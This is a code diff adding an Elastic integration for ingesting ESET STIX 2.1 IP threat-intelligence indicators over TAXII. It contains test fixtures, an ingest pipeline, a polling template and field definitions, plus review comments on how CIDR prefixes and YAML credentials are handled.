"2023-10-15T02:20:04.000Z", "modified": "2023-10-15T02:20:04.000Z", "name": "5.2.75.227", "description": "Web services scanning and attacks", "pattern": "[ipv4-addr:value='1.128.0.0/11']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:20:04Z", "valid_until": "2023-10-17T02:20:04Z", "labels": ["malicious-activity"]} +{"id": "indicator--341fa6d7-b866-449b-bd41-7cd5410f634c", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:20:04.000Z", "modified": "2023-10-15T02:20:04.000Z", "name": "5.2.75.227", "description": "Web services scanning and attacks", "pattern": "[ipv4-addr:value='1.128.0.0/11']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:20:04Z", "valid_until": "2023-10-17T02:20:04Z", "labels": ["malicious-activity"]} +{"id": "indicator--53798940-e5aa-42b7-a2cb-44d1f3b61640", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:20:04.000Z", "modified": "2023-10-15T02:20:04.000Z", "name": "5.2.75.227", "description": "Web services scanning and attacks", "pattern": "[ipv4-addr:value='1.128.0.0/11']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:20:04Z", "valid_until": "2023-10-17T02:20:04Z", "labels": ["malicious-activity"]} +{"id": "indicator--aac59262-2567-45aa-9358-e7850c5ea301", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T03:00:05.000Z", "modified": "2023-10-15T03:00:05.000Z", "name": "5.2.75.227", "description": "Host is known to be actively distributing threats or is of uncertain reputation.", "pattern": "[ipv4-addr:value='1.128.0.0/11:80']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T03:00:05Z", "valid_until": "2023-10-17T03:00:05Z", "labels": ["benign"]} +{"id": "indicator--79211a5b-f76b-4025-a640-0a3a0440b5b3", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T03:00:05.000Z", "modified": "2023-10-15T03:00:05.000Z", "name": 
"5.2.75.227", "description": "Host actively distributes high-severity threat in the form of executable code.", "pattern": "[ipv4-addr:value='1.128.0.0/11:8081']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T03:00:05Z", "valid_until": "2023-10-17T03:00:05Z", "labels": ["benign"]} +{"id": "indicator--60b61a83-36d0-4c29-bd92-b0bde20815a4", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T03:00:05.000Z", "modified": "2023-10-15T03:00:05.000Z", "name": "5.2.75.227", "description": "Host actively distributes high-severity threat in the form of executable code.", "pattern": "[ipv4-addr:value='1.128.0.0/11:80']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T03:00:05Z", "valid_until": "2023-10-17T03:00:05Z", "labels": ["benign"]} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/ip/_dev/test/pipeline/test-eset-ndjson.log-expected.json b/packages/ti_eset/data_stream/ip/_dev/test/pipeline/test-eset-ndjson.log-expected.json new file mode 100644 index 00000000000..8e3c918349f --- /dev/null +++ b/packages/ti_eset/data_stream/ip/_dev/test/pipeline/test-eset-ndjson.log-expected.json 
@@ -0,0 +1,412 @@ +{ + "expected": [ + { + "@timestamp": "2023-10-15T02:20:04.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--38cddce7-f1e3-49d0-91f6-1423f0e157ca", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:20:04.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--38cddce7-f1e3-49d0-91f6-1423f0e157ca\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:20:04.000Z\", \"modified\": \"2023-10-15T02:20:04.000Z\", \"name\": \"5.2.75.227\", \"description\": \"FTP bruteforce IP\", \"pattern\": \"[ipv4-addr:value='1.128.0.0:8080']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:20:04Z\", \"valid_until\": \"2023-10-17T02:20:04Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET IP stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "FTP bruteforce IP", + "ip": "1.128.0.0", + "last_seen": "2023-10-15T02:20:04.000Z", + "modified_at": "2023-10-15T02:20:04.000Z", + "name": "5.2.75.227", + "port": 8080, + "provider": "eset", + "type": "ipv4-addr" + } + } + }, + { + "@timestamp": "2023-10-15T02:20:04.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--dc5b08dd-0c5e-4b7b-902e-cc212be7ee80", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:20:04.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--dc5b08dd-0c5e-4b7b-902e-cc212be7ee80\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:20:04.000Z\", \"modified\": \"2023-10-15T02:20:04.000Z\", \"name\": \"5.2.75.227\", \"description\": \"MySQL bruteforce IP\", \"pattern\": \"[ipv4-addr:value='1.128.0.0']\", \"pattern_type\": \"stix\", 
\"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:20:04Z\", \"valid_until\": \"2023-10-17T02:20:04Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET IP stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "MySQL bruteforce IP", + "ip": "1.128.0.0", + "last_seen": "2023-10-15T02:20:04.000Z", + "modified_at": "2023-10-15T02:20:04.000Z", + "name": "5.2.75.227", + "provider": "eset", + "type": "ipv4-addr" + } + } + }, + { + "@timestamp": "2023-10-15T02:20:04.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--76c98e1d-aad2-4d3c-9618-95327aa8fb16", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:20:04.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--76c98e1d-aad2-4d3c-9618-95327aa8fb16\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:20:04.000Z\", \"modified\": \"2023-10-15T02:20:04.000Z\", \"name\": \"5.2.75.227\", \"description\": \"Web services scanning and attacks\", \"pattern\": \"[ipv4-addr:value='1.128.0.0/11']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:20:04Z\", \"valid_until\": \"2023-10-17T02:20:04Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET IP stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Web services scanning and attacks", + "ip": "1.128.0.0", + "last_seen": "2023-10-15T02:20:04.000Z", + "modified_at": "2023-10-15T02:20:04.000Z", + "name": "5.2.75.227", + "provider": "eset", + "type": "ipv4-addr" + } + } + }, + { + "@timestamp": "2023-10-15T02:20:04.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": 
"indicator--e04adbf1-6fd4-4b80-b780-35c9550a36ef", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:20:04.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--e04adbf1-6fd4-4b80-b780-35c9550a36ef\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:20:04.000Z\", \"modified\": \"2023-10-15T02:20:04.000Z\", \"name\": \"5.2.75.227\", \"description\": \"Web services scanning and attacks\", \"pattern\": \"[ipv4-addr:value='1.128.0.0/11']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:20:04Z\", \"valid_until\": \"2023-10-17T02:20:04Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET IP stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Web services scanning and attacks", + "ip": "1.128.0.0", + "last_seen": "2023-10-15T02:20:04.000Z", + "modified_at": "2023-10-15T02:20:04.000Z", + "name": "5.2.75.227", + "provider": "eset", + "type": "ipv4-addr" + } + } + }, + { + "@timestamp": "2023-10-15T02:20:04.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--ec0c8daf-33f2-48cc-a377-86e60a30516b", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:20:04.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--ec0c8daf-33f2-48cc-a377-86e60a30516b\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:20:04.000Z\", \"modified\": \"2023-10-15T02:20:04.000Z\", \"name\": \"5.2.75.227\", \"description\": \"Web services scanning and attacks\", \"pattern\": \"[ipv4-addr:value='1.128.0.0/11']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:20:04Z\", \"valid_until\": \"2023-10-17T02:20:04Z\", 
\"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET IP stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Web services scanning and attacks", + "ip": "1.128.0.0", + "last_seen": "2023-10-15T02:20:04.000Z", + "modified_at": "2023-10-15T02:20:04.000Z", + "name": "5.2.75.227", + "provider": "eset", + "type": "ipv4-addr" + } + } + }, + { + "@timestamp": "2023-10-15T02:20:04.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--341fa6d7-b866-449b-bd41-7cd5410f634c", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:20:04.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--341fa6d7-b866-449b-bd41-7cd5410f634c\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:20:04.000Z\", \"modified\": \"2023-10-15T02:20:04.000Z\", \"name\": \"5.2.75.227\", \"description\": \"Web services scanning and attacks\", \"pattern\": \"[ipv4-addr:value='1.128.0.0/11']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:20:04Z\", \"valid_until\": \"2023-10-17T02:20:04Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET IP stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Web services scanning and attacks", + "ip": "1.128.0.0", + "last_seen": "2023-10-15T02:20:04.000Z", + "modified_at": "2023-10-15T02:20:04.000Z", + "name": "5.2.75.227", + "provider": "eset", + "type": "ipv4-addr" + } + } + }, + { + "@timestamp": "2023-10-15T02:20:04.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--53798940-e5aa-42b7-a2cb-44d1f3b61640", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:20:04.000Z" + }, + 
"event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--53798940-e5aa-42b7-a2cb-44d1f3b61640\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:20:04.000Z\", \"modified\": \"2023-10-15T02:20:04.000Z\", \"name\": \"5.2.75.227\", \"description\": \"Web services scanning and attacks\", \"pattern\": \"[ipv4-addr:value='1.128.0.0/11']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:20:04Z\", \"valid_until\": \"2023-10-17T02:20:04Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET IP stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Web services scanning and attacks", + "ip": "1.128.0.0", + "last_seen": "2023-10-15T02:20:04.000Z", + "modified_at": "2023-10-15T02:20:04.000Z", + "name": "5.2.75.227", + "provider": "eset", + "type": "ipv4-addr" + } + } + }, + { + "@timestamp": "2023-10-15T03:00:05.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--aac59262-2567-45aa-9358-e7850c5ea301", + "labels": [ + "benign" + ], + "valid_until": "2023-10-17T03:00:05.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--aac59262-2567-45aa-9358-e7850c5ea301\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T03:00:05.000Z\", \"modified\": \"2023-10-15T03:00:05.000Z\", \"name\": \"5.2.75.227\", \"description\": \"Host is known to be actively distributing threats or is of uncertain reputation.\", \"pattern\": \"[ipv4-addr:value='1.128.0.0/11:80']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T03:00:05Z\", \"valid_until\": \"2023-10-17T03:00:05Z\", \"labels\": [\"benign\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + 
"threat": { + "feed": { + "name": "ESET IP stix 2.1" + }, + "indicator": { + "confidence": "Low", + "description": "Host is known to be actively distributing threats or is of uncertain reputation.", + "last_seen": "2023-10-15T03:00:05.000Z", + "modified_at": "2023-10-15T03:00:05.000Z", + "name": "5.2.75.227", + "provider": "eset", + "type": "ipv4-addr" + } + } + }, + { + "@timestamp": "2023-10-15T03:00:05.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--79211a5b-f76b-4025-a640-0a3a0440b5b3", + "labels": [ + "benign" + ], + "valid_until": "2023-10-17T03:00:05.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--79211a5b-f76b-4025-a640-0a3a0440b5b3\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T03:00:05.000Z\", \"modified\": \"2023-10-15T03:00:05.000Z\", \"name\": \"5.2.75.227\", \"description\": \"Host actively distributes high-severity threat in the form of executable code.\", \"pattern\": \"[ipv4-addr:value='1.128.0.0/11:8081']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T03:00:05Z\", \"valid_until\": \"2023-10-17T03:00:05Z\", \"labels\": [\"benign\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET IP stix 2.1" + }, + "indicator": { + "confidence": "Low", + "description": "Host actively distributes high-severity threat in the form of executable code.", + "last_seen": "2023-10-15T03:00:05.000Z", + "modified_at": "2023-10-15T03:00:05.000Z", + "name": "5.2.75.227", + "provider": "eset", + "type": "ipv4-addr" + } + } + }, + { + "@timestamp": "2023-10-15T03:00:05.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--60b61a83-36d0-4c29-bd92-b0bde20815a4", + "labels": [ + "benign" + ], + "valid_until": "2023-10-17T03:00:05.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": 
"enrichment", + "original": "{\"id\": \"indicator--60b61a83-36d0-4c29-bd92-b0bde20815a4\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T03:00:05.000Z\", \"modified\": \"2023-10-15T03:00:05.000Z\", \"name\": \"5.2.75.227\", \"description\": \"Host actively distributes high-severity threat in the form of executable code.\", \"pattern\": \"[ipv4-addr:value='1.128.0.0/11:80']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T03:00:05Z\", \"valid_until\": \"2023-10-17T03:00:05Z\", \"labels\": [\"benign\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET IP stix 2.1" + }, + "indicator": { + "confidence": "Low", + "description": "Host actively distributes high-severity threat in the form of executable code.", + "last_seen": "2023-10-15T03:00:05.000Z", + "modified_at": "2023-10-15T03:00:05.000Z", + "name": "5.2.75.227", + "provider": "eset", + "type": "ipv4-addr" + } + } + } + ] +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/ip/_dev/test/system/test-httpjson-config.yml b/packages/ti_eset/data_stream/ip/_dev/test/system/test-httpjson-config.yml new file mode 100644 index 00000000000..c923ad19c20 --- /dev/null +++ b/packages/ti_eset/data_stream/ip/_dev/test/system/test-httpjson-config.yml @@ -0,0 +1,13 @@ +input: httpjson +service: eti +vars: + username: test + password: test +data_stream: + vars: + preserve_original_event: true + url: http://{{Hostname}}:{{Port}}/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/baaed2a92335418aa753fe944e13c23a/objects/ + interval: 30s + enable_request_tracer: true +assert: + hit_count: 2 diff --git a/packages/ti_eset/data_stream/ip/agent/stream/httpjson.yml.hbs b/packages/ti_eset/data_stream/ip/agent/stream/httpjson.yml.hbs new file mode 100644 index 00000000000..41117cedade --- /dev/null +++ b/packages/ti_eset/data_stream/ip/agent/stream/httpjson.yml.hbs 
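Review bot: The expected output pins behaviour that narrows or drops network indicators: every `[ipv4-addr:value='1.128.0.0/11']` input comes out as `threat.indicator.ip: 1.128.0.0` with the `/11` prefix gone, and the three `1.128.0.0/11:80` / `1.128.0.0/11:8081` inputs have no `threat.indicator.ip` and no `threat.indicator.port` at all, only name, description, confidence and `type: ipv4-addr`, whereas the plain `1.128.0.0:8080` input yields both `ip` and `port: 8080`. An `ip`-typed field cannot hold a network, so stripping the prefix is understandable, but the prefix should then be preserved in a keyword field declared by the package so the indicator's scope is not silently reduced to one host, and the `cidr:port` form should be parsed the same way as `ip:port` rather than losing the address. The ip data stream pipeline that produces these values is outside this chunk, so this is inferred from the fixtures; once it is adjusted, this file should be regenerated so the CIDR and CIDR-plus-port cases are asserted rather than accepted as empty.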
@@ -0,0 +1,72 @@ +config_version: "2" + +interval: {{interval}} +request.method: "GET" +{{#if enable_request_tracer}} +request.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson" +{{/if}} + +auth.basic.user: {{username}} +auth.basic.password: {{password}} + +{{#if url}} +request.url: {{url}} +{{/if}} +{{#if ssl}} +request.ssl: {{ssl}} +{{/if}} +{{#if http_client_timeout}} +request.timeout: {{http_client_timeout}} +{{/if}} +{{#if proxy_url}} +request.proxy_url: {{proxy_url}} +{{/if}} + +request.transforms: + - set: + target: header.Content-Type + value: application/taxii+json;version=2.1 + - set: + target: header.Accept + value: application/taxii+json;version=2.1 + - set: + target: url.params.match[type] + value: indicator + - set: + target: url.params.limit + value: {{page_size}} + - set: + target: url.params.added_after + value: '[[ .cursor.timestamp ]]' + default: '[[ formatDate (now (parseDuration "-{{initial_interval}}")) "2006-01-02T15:04:05.000Z" ]]' + +response.pagination: + - set: + target: url.params.added_after + value: >- + [[ if .last_response.body.more ]][[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ end ]] + fail_on_template_error: true + +response.split: + target: body.objects + +cursor: + timestamp: + value: >- + [[ if .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ else ]][[.last_response.url.params.Get "added_after"]][[ end ]] + ignore_empty_value: true + +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/ti_eset/data_stream/ip/elasticsearch/ilm/default_policy.json b/packages/ti_eset/data_stream/ip/elasticsearch/ilm/default_policy.json new file mode 100644 index 00000000000..459c9fffc4e --- /dev/null 
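Review bot: `auth.basic.user: {{username}}` and `auth.basic.password: {{password}}` are rendered as bare YAML scalars, so a credential that starts with `*`, `&`, `{`, `[`, `!` or `%`, or contains `: ` or ` #`, will either fail to parse or be silently truncated when the agent renders this template. The other literals in this file (`request.method`, `request.tracer.filename`) are quoted; doing the same here, `auth.basic.user: "{{username}}"` and `auth.basic.password: "{{password}}"`, narrows the failure to values containing `"` or `\`, which is then worth stating on the package-level variable definition (not visible in this chunk). `request.url: {{url}}` has the same exposure if the URL carries a query string with `#`.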
+++ b/packages/ti_eset/data_stream/ip/elasticsearch/ilm/default_policy.json @@ -0,0 +1,23 @@ +{ + "policy": { + "phases": { + "delete": { + "actions": { + "delete": {} + }, + "min_age": "7d" + }, + "hot": { + "actions": { + "rollover": { + "max_age": "2d", + "max_size": "50gb" + }, + "set_priority": { + "priority": 100 + } + } + } + } + } +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/ip/elasticsearch/ingest_pipeline/default.yml b/packages/ti_eset/data_stream/ip/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..5756fe8c4e7 --- /dev/null +++ b/packages/ti_eset/data_stream/ip/elasticsearch/ingest_pipeline/default.yml 
@@ -0,0 +1,149 @@ +--- +description: Pipeline for processing IP collection feed +processors: + - set: + field: ecs.version + value: '8.11.0' + - set: + field: event.kind + value: enrichment + - append: + field: event.category + value: threat + allow_duplicates: false + - append: + field: event.type + value: indicator + allow_duplicates: false + - set: + field: threat.indicator.provider + value: eset + - rename: + field: message + target_field: event.original + ignore_missing: true + if: ctx.event?.original == null + - json: + field: event.original + target_field: eti + - drop: + if: ctx.eti?.type != 'indicator' + - set: + field: threat.feed.name + value: "ESET IP stix 2.1" + - date: + field: eti.created + target_field: "@timestamp" + formats: + - "ISO8601" + if: "ctx.eti?.created != null" + - date: + field: eti.modified + target_field: threat.indicator.last_seen + formats: + - "ISO8601" + if: "ctx.eti?.modified != null" + - set: + field: threat.indicator.modified_at + copy_from: threat.indicator.last_seen + if: "ctx.threat?.indicator?.last_seen != null" + - date: + field: eti.valid_until + target_field: eset.valid_until + formats: + - "ISO8601" + if: "ctx.eti?.valid_until != null" + - rename: + field: eti.id + target_field: eset.id + ignore_missing: true + - rename: + field: eti.description + target_field: threat.indicator.description + ignore_missing: true + - foreach: + field: eti.labels + processor: + append: + field: eset.labels + value: "{{_ingest._value}}" + ignore_missing: true + ignore_failure: true + if: ctx.eti?.labels != null + - script: + lang: painless + params: + "malicious-activity": 'High' + "phishing-activity": 'High' + "unwanted-activity": 'Medium' + "benign": 'Low' + if: ctx.eset?.labels != null + source: > + for (def label : ctx.eset.labels) { + if (params.containsKey(label)) { + ctx.threat.indicator.confidence = params.get(label); + break; + } + } + - split: + field: eti.pattern + target_field: eti._patterns + separator: ' OR ' + 
ignore_missing: true + - foreach: + field: eti._patterns + processor: + grok: + field: _ingest._value + patterns: + - "^\\[ipv4-addr:value%{SPACE}=%{SPACE}'%{IP:threat.indicator.ip}:%{NUMBER:threat.indicator.port:int}'\\]?" + - "^\\[ipv4-addr:value%{SPACE}=%{SPACE}'%{IP:threat.indicator.ip}/%{NUMBER}'\\]?" + - "^\\[ipv4-addr:value%{SPACE}=%{SPACE}'%{IP:threat.indicator.ip}'\\]?" + ignore_failure: true + - set: + field: threat.indicator.type + value: ipv4-addr + - set: + field: threat.indicator.name + copy_from: eti.name + if: "ctx.eti?.name != null" + - remove: + field: + - eti + ignore_missing: true + - remove: + field: event.original + if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))" + ignore_failure: true + ignore_missing: true + - script: + tag: script_to_drop_null_values + lang: painless + description: Drops null/empty values recursively. + source: |- + boolean drop(Object o) { + if (o == null || o == '') { + return true; + } else if (o instanceof Map) { + ((Map) o).values().removeIf(v -> drop(v)); + return (((Map) o).size() == 0); + } else if (o instanceof List) { + ((List) o).removeIf(v -> drop(v)); + return (((List) o).length == 0); + } + return false; + } + drop(ctx); + - append: + field: event.kind + value: pipeline_error + allow_duplicates: false + if: ctx.error?.message != null +on_failure: + - set: + field: error.message + value: '{{ _ingest.on_failure_message }}' + - set: + field: event.kind + tag: set_pipeline_error_to_event_kind + value: pipeline_error diff --git a/packages/ti_eset/data_stream/ip/fields/agent.yml b/packages/ti_eset/data_stream/ip/fields/agent.yml new file mode 100644 index 00000000000..845b84ed9c0 --- /dev/null +++ b/packages/ti_eset/data_stream/ip/fields/agent.yml 
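Review bot: The three grok patterns in the `eti._patterns` foreach do not cover the `address/prefix:port` form, and the pipeline test fixture in this same commit (`[ipv4-addr:value='1.128.0.0/11:80']`) shows the consequence: the grok runs with `ignore_failure: true`, so the document is indexed without `threat.indicator.ip` or `threat.indicator.port` and the indicator can never be matched on. Adding `- "^\\[ipv4-addr:value%{SPACE}=%{SPACE}'%{IP:threat.indicator.ip}/%{NUMBER}:%{NUMBER:threat.indicator.port:int}'\\]?"` as the first pattern covers that case. The `/%{NUMBER}` patterns also discard the prefix length, so a network indicator is stored as its base address only; a comment above the grok saying so would stop the next maintainer assuming full CIDR coverage. If silent non-matches are not wanted, a per-processor `on_failure` that appends to `error.message` is preferable to `ignore_failure: true`.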
@@ -0,0 +1,201 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. 
+- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' 
+ - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type. 
diff --git a/packages/ti_eset/data_stream/ip/fields/base-fields.yml b/packages/ti_eset/data_stream/ip/fields/base-fields.yml
new file mode 100644
index 00000000000..7c798f4534c
--- /dev/null
+++ b/packages/ti_eset/data_stream/ip/fields/base-fields.yml
@@ -0,0 +1,12 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: '@timestamp'
+ type: date
+ description: Event timestamp.
